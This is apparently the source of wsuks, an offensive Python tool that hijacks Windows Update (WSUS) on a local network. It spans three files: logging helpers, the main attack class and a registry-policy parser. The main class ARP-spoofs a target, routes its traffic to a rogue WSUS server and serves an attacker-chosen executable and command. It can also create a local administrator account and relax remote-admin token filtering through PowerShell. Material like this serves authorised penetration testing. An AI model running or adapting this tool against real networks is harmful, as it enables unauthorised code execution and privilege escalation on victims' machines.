
import logging
import sys
from termcolor import colored


class WsuksFormatter(logging.Formatter):
    """Prefixing logged messages through the custom attribute 'bullet'."""

    def __init__(self):
        logging.Formatter.__init__(self, "%(bullet)s %(message)s", None)

    def format(self, record):
        if record.levelno == logging.DEBUG:
            record.bullet = colored("DEBUG", "magenta", attrs=["bold"])
        elif record.levelno == logging.INFO:
            record.bullet = colored("[*]", "blue", attrs=["bold"])
        elif record.levelno == logging.SUCCESS:
            record.bullet = colored("[+]", "green", attrs=["bold"])
        elif record.levelno == logging.WARNING:
            record.bullet = colored("[!]", "yellow", attrs=["bold"])
        elif record.levelno == logging.ERROR:
            record.bullet = colored("[-]", "red", attrs=["bold"])
        elif record.levelno == logging.CRITICAL:
            record.bullet = colored("[CRITICAL]", "red", attrs=["bold", "reverse"])
        elif record.levelno:
            record.bullet = "[ERROR]"

        return logging.Formatter.format(self, record)


class WsuksFormatterTimeStamp(WsuksFormatter):
    """Prefixing logged messages through the custom attribute 'bullet'."""

    def __init__(self):
        logging.Formatter.__init__(self, "[%(asctime)-15s] %(bullet)s %(message)s", None)

    def formatTime(self, record, datefmt=None):
        return WsuksFormatter.formatTime(self, record, datefmt="%Y-%m-%d %H:%M:%S")


def addSuccessLogLevel(logger):
    logging.SUCCESS = 25  # between WARNING and INFO
    logging.addLevelName(logging.SUCCESS, "SUCCESS")

    def success(self, msg, *args, **kwargs):
        logger._log(25, msg, args, **kwargs)
    logging.getLoggerClass().success = success


def initLogger(ts=False, debug=False):
    """
    Initialize wsuks logger with specified logging level, add formatter, handler and success log level

    :param ts: Add timestamp to log messages
    :param debug: Set logging level to DEBUG
    :return: logger
    """
    handler = logging.StreamHandler(sys.stdout)
    if ts:
        handler.setFormatter(WsuksFormatterTimeStamp())
    else:
        handler.setFormatter(WsuksFormatter())

    logger = logging.getLogger("wsuks")
    logger.propagate = False
    root_logger = logging.getLogger()

    logger.addHandler(handler)
    root_logger.addHandler(handler)

    if debug:
        logger.setLevel(logging.DEBUG)
        root_logger.setLevel(logging.DEBUG)
    else:
        logger.setLevel(logging.INFO)
        root_logger.setLevel(logging.INFO)

    addSuccessLogLevel(logger)
    addSuccessLogLevel(root_logger)

    return logger



from functools import partial
from http.server import HTTPServer
import logging
import os
from pprint import pformat
import random
from string import digits, ascii_letters
from scapy.all import get_if_addr
import wsuks
from wsuks.helpers.arpspoofer import ArpSpoofer
from wsuks.helpers.logger import initLogger
from wsuks.helpers.argparser import initParser, printBanner
from wsuks.helpers.sysvolparser import SysvolParser
from wsuks.helpers.wsusserver import WSUSUpdateHandler, WSUSBaseServer
from wsuks.helpers.router import Router
from termcolor import colored


class Wsuks:
    def __init__(self, args):
        self.args = args

        self.logger = logging.getLogger("wsuks")
        self.interface = args.interface
        try:
            self.hostIp = get_if_addr(self.interface)
        except ValueError:
            self.logger.error(f"Interface '{args.interface}' not found! Exiting...")
            exit(1)
        self.local_username = "user" + "".join(random.choice(digits) for i in range(5))
        self.local_password = "".join(random.sample(ascii_letters, 16))

        # Set args
        self.targetIp = args.targetIp  # Never None (required)
        self.executable_file = args.executable.read()
        self.executable_name = os.path.basename(args.executable.name)
        args.executable.close()

        # Set Command
        if "CREATE_USER_COMMAND" not in args.command:
            self.command = args.command
        else:
            # Case we add the domain user to the local admin group
            if args.username and args.domain:
                self.logger.success(f"Using domain user for the WSUS attack: User={highlight(args.username, 'green')} Password={highlight(args.password, 'green')} Domain={highlight(args.domain, 'green')}")
                self.command = str(args.command).format(CREATE_USER_COMMAND="", WSUKS_USER=args.domain + "\\" + args.username)
            # Case we generate a local user, add him to the local admin group and make sure LocalAccountTokenFilterPolicy is set to 1
            else:
                with open(os.path.join(os.path.dirname(wsuks.__file__), "executables/Enable-LocalAccountTokenFilterPolicy.ps1")) as file:
                    ps_script = ""
                    for line in file:
                        if line.startswith("#"):
                            continue
                        else:
                            ps_script += line
                self.logger.success(f"Generated local user for the WSUS attack: Username={highlight(self.local_username, 'green')} Password={highlight(self.local_password, 'green')}")
                create_user = f"New-LocalUser -Name {self.local_username} -Password $(ConvertTo-SecureString {self.local_password} -AsPlainText -Force) -Description $(\n{ps_script});\n"
                self.command = str(args.command).format(CREATE_USER_COMMAND=create_user, WSUKS_USER=self.local_username)
        self.logger.success(f"Command to execute: \n{highlight(self.executable_name, 'yellow')} {highlight(self.command, 'yellow')}")

        self.wsusIp = args.wsusIp
        self.wsusPort = args.wsusPort  # Default 8530
        self.domain_username = args.username
        self.domain_password = args.password
        self.domain = args.domain
        self.dcIp = args.dcIp
        self.kerberos = args.kerberos
        self.dcName = args.dcName

    def run(self):
        # Get the WSUS server IP and Port from the sysvol share
        sysvolparser = SysvolParser()
        if not self.wsusIp:
            self.logger.info("WSUS Server not specified, trying to find it in SYSVOL share on DC")
            self.wsusIp, self.wsusPort = sysvolparser.findWsusServer(self.domain, self.domain_username, self.domain_password, self.dcIp, self.kerberos, self.dcName)
        else:
            self.logger.info(f"WSUS Server specified manually: {self.wsusIp}:{self.wsusPort}")

        if self.args.only_discover:
            self.logger.info("Discovered WSUS Server, Exiting...")
            return

        self.logger.info("===== Setup done, starting services =====")
        # Start Arp Spoofing
        arpspoofer = ArpSpoofer(self.interface)
        arpspoofer.start(self.targetIp, self.wsusIp)

        # Set up routing to route spoofed packages to the local HTTP server
        router = Router(self.targetIp, self.hostIp, self.wsusIp, self.wsusPort, self.interface)
        router.start()

        # Prepare WSUS HTTP Server
        update_handler = WSUSUpdateHandler(self.executable_file, self.executable_name, f"{self.hostIp}:{self.wsusPort}")
        update_handler.set_resources_xml(self.command)

        self.logger.debug(update_handler)

        http_handler = partial(WSUSBaseServer, update_handler)
        http_server = HTTPServer((self.hostIp, self.wsusPort), http_handler)
        try:
            self.logger.info(f"Starting WSUS Server on {self.hostIp}:{self.wsusPort}...")
            http_server.serve_forever()
        except KeyboardInterrupt:
            print()
            self.logger.info("===== Stopping Services =====")
            self.logger.info("Stopping WSUS Server...")
        finally:
            arpspoofer.stop()
            router.stop()


def highlight(text, color):
    return colored(text, color, attrs=["bold"])


def main():
    # Setup
    printBanner()
    args = initParser()

    logger = initLogger(ts=args.timestamp, debug=args.debug)
    logger.debug("Passed args:\n" + pformat(vars(args)))

    # Prevent scapy from logging to console
    logging.getLogger("scapy").disabled = True
    logging.getLogger("scapy.runtime").disabled = True

    if os.geteuid() != 0:
        logger.error("This script must be run as root!")
        exit(1)

    wsuks = Wsuks(args)
    wsuks.run()


if __name__ == "__main__":
    main()



import re
import struct
from registrypol.values import RegistryValue
import logging


REG_NONE = 0
REG_SZ = 1
REG_EXPAND_SZ = 2
REG_BINARY = 3
REG_DWORD = 4
REG_DWORD_LITTLE_ENDIAN = 4
REG_DWORD_BIG_ENDIAN = 5
REG_LINK = 6
REG_MULTI_SZ = 7
REG_QWORD = 11
REG_QWORD_LITTLE_ENDIAN = 11

REG_TYPES = {
    0: "REG_NONE",
    1: "REG_SZ",
    2: "REG_EXPAND_SZ",
    3: "REG_BINARY",
    4: "REG_DWORD_LITTLE_ENDIAN",
    5: "REG_DWORD_BIG_ENDIAN",
    6: "REG_LINK",
    7: "REG_MULTI_SZ",
    11: "REG_QWORD_LITTLE_ENDIAN",
}


class RegistryPolicy:
    header = b"Preg" + b"\x01\x00\x00\x00"

    def __init__(self, policy_data):
        self.data = policy_data
        self.parsed_regpol = []
        self.policies = []
        self.logger = logging.getLogger("wsuks")

        # Start parsing the registry policy data
        self.parse_policy()

        for policy in self.parsed_regpol:
            # Parsing the data based on the type
            # src: https://learn.microsoft.com/en-us/windows/win32/sysinfo/registry-value-types
            if policy.type == REG_NONE:
                data = policy.data
            elif policy.type == REG_SZ:  # noqa: SIM114
                data = policy.data.decode("utf-16-le").rstrip("\x00")
            elif policy.type == REG_EXPAND_SZ:
                data = policy.data.decode("utf-16-le").rstrip("\x00")
            elif policy.type == REG_BINARY:
                data = policy.data
            elif policy.type == REG_DWORD_LITTLE_ENDIAN:  # REG_DWORD
                data = struct.unpack("<I", policy.data)[0]
            elif policy.type == REG_DWORD_BIG_ENDIAN:
                data = struct.unpack(">I", policy.data)[0]
            elif policy.type == REG_LINK:
                data = policy.data.decode("utf-16-le").rstrip("\x00")
            elif policy.type == REG_MULTI_SZ:
                data = []
                for string in policy.data.decode("utf-16-le").split("\x00"):
                    if string:
                        data.append(string.decode("utf-16-le"))
            elif policy.type == REG_QWORD_LITTLE_ENDIAN:  # REG_QWORD
                data = struct.unpack("<Q", policy.data)[0]
            else:
                data = policy.data

            self.policies.append({
                "key": policy.key.rstrip("\x00"),
                "value": policy.value.rstrip("\x00"),
                "type": REG_TYPES[policy.type],
                "size": policy.size,
                "data": data,
            })

    def get_policies(self):
        return self.policies

    def parse_policy(self):
        values = re.findall(rb"\x5b\x00.*?\x5d\x00", self.data)
        for value in values:
            try:
                self.parsed_regpol.append(RegistryValue.from_bytes(value))
            except ValueError as e:
                self.logger.error(f"Error parsing registry value: {e}. Skipping value: {value}")
